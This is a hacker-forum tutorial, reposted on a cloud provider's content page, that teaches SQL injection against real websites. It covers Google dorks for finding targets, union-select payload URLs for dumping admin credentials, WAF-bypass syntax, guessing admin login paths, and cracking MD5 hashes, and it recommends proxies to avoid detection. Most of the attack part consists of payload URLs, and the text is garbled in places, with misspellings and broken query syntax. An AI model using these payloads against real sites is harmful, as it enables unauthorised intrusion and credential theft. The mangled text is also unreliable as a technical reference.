Full Detailed Basic SQL Injection-Zer0PwN

Source: Internet
Author: User
Tags basic sql injection md5 hash sql injection tutorial hex code

---------------------------------------------------
> GR33TZ T0 Zer0Lulz Group
> D0nt L33ch
> Author Zer0Pwn
> Paper = SQL Injection Tutorial
> Homep4ge % Hackforums.net
---------------------------------------------------
 
 
 
Hey guys, today I'm going to give you a good, detailed and basic SQL Injection tutorial. I suppose most of you are beginners to SQL Injection. so let's do a quick review to see what an SQL Injection really is.
 
What Is an SQL Injection?
 
An SQL Injection, is basically a code injection that exploits the area vulnerable to SQL Injection. the injected code will be exploiting the Database, to get Information. such as Emails, Usernames, Passwords, etc.
In this Tutorial, we'll be looking for the Admin Panel's credentials. keep in mind, I said Admin Panel, not control panel. while inserting Ming an SQL Injection, you may not always find what you're looking. some sites have secured the important information, so that it will not be compromised so easily.
 
Finding a Vulnerable Site
 
You can find a vulnerable site using Dorks. Use google, it's the best way. A dork is something like this
 
Code:
Inurl: news. php? Id =
Inurl: event. php? Id =
Inurl: order. php? Id =
Inurl: user. php? Id =
Inurl: restaurant. php? Id =
Inurl: buy. php? Id =
 
There are Hundreds of Thousands of others, and there are also some Posts about Dorks, so you cocould read those if you want to find a good site to exploit with SQL Injection.
 
Exploiting the Database
 
Alright? Are you all ready for the fun of an SQL Injection? Okay, so first, we need to test our site to see if it's vulnerable to SQL Injection. I will use a random site name for my Example:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id = 1
 
Our site HAS to have an '=' in it. otherwise we cannot use SQL Injection to exploit the Database. so after the 1 (In the ID) put a 'so that it looks like this:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id = 1'
 
Now if we get a MySQL error, then our site is probably vulnerable. If it just refreshes the page normally, then our site is not vulnerable.
 
Finding the number of columns
 
Now, we know our site is vulnerable to SQL Injection, so we want to start getting the Info out of the Database. but before we do that, we have to find out WHICH columns are vulnerable to SQL Injection. but we don't know how many columns there are yet, so we need that first. to find the number of columns we need to use a command called 'ORDER '. this command will help us determine how many columns there are. so your URL shocould now look like this:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id = 1 order by 2 --
 
Now if the site just refreshed to it's normal state, that's good. So we didn't get an error, so we have to continue until we get an error.
 
Http://www.hopefullyvulnerablesite.com/event.php? Id = 1 order by 3 --
* No error *
 
Http://www.hopefullyvulnerablesite.com/event.php? Id = 1 order by 4 --
* No error *
 
Http://www.hopefullyvulnerablesite.com/event.php? Id = 1 order by 5 --
* ERROR *
 
Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an error.
 
URGENT
The two hyphen's (--) are critical for executing the command. the two hyphens will tell the site that it's a command, and will execute. so we NEED those at the end of every command.
 
Finding the vulnerable column
 
We now have the number of columns. but we just need to find out which one (s) are vulnerable to the execution of SQL commands. so we will use a command called "union select ". this is what will find the vulnerable column (s ). so we need to add that command into our URL. after that command, we need to add the number of columns there are. so now our URL shocould look like this:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id =-1 union select 1, 2, 4 --
 
A couple of number will appear on your screen. that is normal, and is a good sign. those numbers, are the numbers of columns that are vulnerable to SQL Injection. so those are the columns we need to execute our commands in. so lets say that column 2 appeared on the Page. we will be executing commands in column 2.
 
URGENT
You HAVE to have the-after the =. That is critical.
 
Determining the Version of the MySQL Database
 
Why do we need the version you ask? Because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5.
 
So our vulnerable column is 2. so that's where we'll be executing the code. replace the 2 with your command. the command is: @ version. so your URL shocould now look like this:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id =-1 union select 1, @ version, 3, 4 --
 
Now it shoshould display the Version on the page. It shoshould look something like this:
 
Code:
5.1.47-community-log
 
The numbers don't matter, as long as they're at least 5, or over.
 
Finding the name of the Database
 
The name of the Database is important. at least if we want to look in the Tables which will contain the information. to find the name of the database, there are 2 most common ways. they both will work. the first command is:
 
Code:
Http: // hopefullyvulnerablesite/event. php? Id =-1 union select 1, group_concat (schema_name), 3,4 from information_schema.schemata --
 
Sometimes, that command will show you more than the Database name. But all we want is the database name, so the better command wowould prefferably be:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id =-1 union select 1, concat (database (), 3, 4 --
 
Now you will be showed the Database name. Congrats, look how far we are already. Now to the good stuff!
 
Viewing the Tables in the Database
 
The tables are what contains information. That's why we need to view them. So we can get the information we seek.
 
The command to view the tables is longer than the few we 've seen already. So here's what your URL shoshould now look like:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id =-1 union select 1, group_concat (table_name), 3,4 FROM information_schema.tables WHERE table_schema = database ()--
 
Hit enter, and the Tables in the Database will be displayed. Yeye
 
Viewing the Tables 'information
 
We will most likely be given tables. It is up to you to decide which one contains the valuable information.
 
So it can be at times difficult to choose a table that woshould contain important information. however, we will not always need the username, as it is most likely "admin ". but the password, is what we REALLY need. so choose a table. the one I will use for this example will be "admin_credentials ". it's very rare that you'll get a Table with a title basically making you choose that one. so this time use this query/command:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id =-1 union select 1, group_concat (column_name), 3,4 FROM information_schema.columns WHERE table_name = "admin_credentials"
 
For that query, you will almost ALWAYS get an error. So instead, convert the 'admin _ credentials' to Hex.
 
To do that, I reccomend this site:
Spoiler (Click to View)
 
Once you 've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it shoshould look like this:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id =-1 union select 1, group_concat (column_name), 3,4 FROM information_schema.columns WHERE table_name = 0x61646d696e5f63726564656e7469616c73
 
URGENT
You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will NOT work.
 
Displaying the Contents
 
There will still be some tables inside the table you 've chosen. So you need to get the information, and that will usually mean goodbye tables, and HELLO Admin Panel access.
 
Let's say that mine is displaying "userpword" and "user ". those are the only columns that are displaying for me (However, this will very rarely be the case ). so we need to access the information in there. we can access them both at a time actually. but if you prefer one at a time, use this query:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id =-1 union select 1, group_concat (userpword), 3,4 FROM DBName. admin_credentials --
 
That will display the information. where it says DBName, you need to put the name of the Database you got earlier in this tutorial. an where it says admin_credentials, you need to put the table that you are inside.
 
Now we shoshould have all the credentials, so we just need to find the Admin Login.
 
Finding the AdminLogin
 
Usually, all you'll have to do is take a quick look by adding a small/admin or/index. php/admin.
 
Like this:
 
Code:
Http://www.hopefullyvulnerablesite.com/admin
Http://www.hopefullyvulnerablesite.com/admin.php
Http://www.hopefullyvulnerablesite.com/login.php
Http://www.hopefullyvulnerablesite.com/admin/index.php
Http://www.hopefullyvulnerablesite.com/login/index.php
Http://www.hopefullyvulnerablesite.com/adminlogin
Http://www.hopefullyvulnerablesite.com/adminlogin.php
Http://www.hopefullyvulnerablesite.com/adminlogin/index.php
Http://www.hopefullyvulnerablesite.com/moderator.php
Http://www.hopefullyvulnerablesite.com/moderator
Http://www.hopefullyvulnerablesite.com/modlogin
 
And there are plenty more. at times, you will not find the Login, so you'll need an "Admin Login" finder. there are some online, and there are also downloads. I recommend doing it manually, because it brings a more proud-ness after hacking the Website.
 
WAF By-Passing
 
You may be asking, what is WAF By-Passing? First off, I'll be explaining what WAF is.
 
WAF stands for Web Application Firewall. A Web Application Firewall is put in place, so that their website will be secure from attacks such as SQL Injection, XSS, and more exploitation methods. the WAF filters commands put through to the Database, and detects attakcs against the site.
 
A waf Error will look like this:
 
Code:
FORBIDDEN
 
You are not allowed to access "" on this server
* Information about the webserver is here *
 
If we get that error when we're re using Union Select, that means that there is a WAF set in the webserver. so, in-order to by-pass it, we'll have to change our Syntax of the command, so that the filter doesn't detect an attack.
 
There are several methods on how to by-pass the WAF, I will be explaining a few:
 
1.
You don't have to worry about getting the number of columns, the firewalldon't block that, however, the DO block the union select command, so here is method 1, on how to By-Pass the Firewall.
 
The code we're re going to be using will be using different "Symbols" to by-pass the filter. It looks like this:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id =-1 /*! UNION *//*! SELECT */1, 2, 3 --
 
That will by-pass the Firewall. However, we still have several steps. Because we still need the other information from the tables and columns.
 
Once that is done, we will be getting the information from the vulnerable columns, so here's what it shoshould look like:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.phpid=-1 /*! UNION *//*! SELECT */1, CoNcAt (version (), 3 --
 
To make this tutorial a little shorter, we'll be grabbing more information with just one command. So let's try it like this:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id =-1 /*! UNION *//*! SELECT */1, CoNcAt (version (), 0x3a, user (), 0x3a, database (), 0x3a), 3 --
 
Now, it shoshould be displaying the information we asked for in order. So it'll be showing the Version, then the Username, then the Database name.
 
Now we'll be getting the table names. So we will again, have to by-pass the WAF. This time, the command will look like this:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id =-1 /*! UNION *//*! SELECT */1, Group_Concat (table_name), 3 from /*! Information_schema */. tables where table_schema = database ()--
 
Now, that will be displaying all the tables. Now that access the table's information, we're re going to use this commdn to by-pass the firewall:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id =-1 /*! UNION *//*! SELECT */1, Group_Concat (column_name), 3 from /*! Information_schema */. columns where table_name = 0x * hex code of the table name *--
 
There we go, now we're re looking at the information of the tables. Now we want to dump the columns, so here's what we'll use:
 
Code:
Http://www.hopefullyvulnerablesite.com/event.php? Id =-1 /*! UNION *//*! SELECT */1, Group_Concat (* column name here *), 3 from * database name here *. * table name here *
 
And that's all for WAF By-Passing. hopefully now, you're an SQL Injection expert :). if you need any more help, feel free to PM me, or even add a comment. I really hope this helped, good luck!
 
Cracking Hashes
 
What is a Hash you may be asking? A hash is basically an encrypted version of a Password, or any other "Hidden" information that can be used against the person, and/or site. people encrypt their passwords into a Hash, so that if there is a security breach, it will be hard to get the true password of the User, or Admin Panel.
 
There are invalid types of hashes, but the most popular to this day, is the MD5 hash. MD5 isn't an easy hash to decrypt, because you have to encrypt other passwords, and compare them to the Hash, there is no official way to decrypt them in any other way.
 
The best site you'll find on decrypting a Hash, wocould definitely be
Spoiler (Click to Hide)
Http://www.md5decrypter.co.uk/
 
But, if you 've got some time on your hands, and if you wocould like a better decryption, I reccomend using Cain & Abel. you can perform a dictionary attack on a MD5 encrypted Hash.
You'll need a wordlist.
This dictionary attack won't ALWAYS work, but most of the time it will. it all depends on the knowledge of the Webmaster. some people use random strings of numerals and letters. which in that case, you 'd have to Bruteforce, which wocould be much more of a hassystemic.
 
There are plenty of Wordlists that you can find on HF. If you can't find any, PM me and I'll give you a link.
 
Epilogue
 
This tutorial took me a long time to write, and I really hope this will help people understand how to perform an SQL Injection.
 
SQL Injection IS ILLEGAL. so whatever you do with it, is your responsibilty, not mine. you can get in lots of trouble for an SQL Injection. check out the Proxies and Socks section for protection while hacking a site.
 
Good luck! And have fun!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.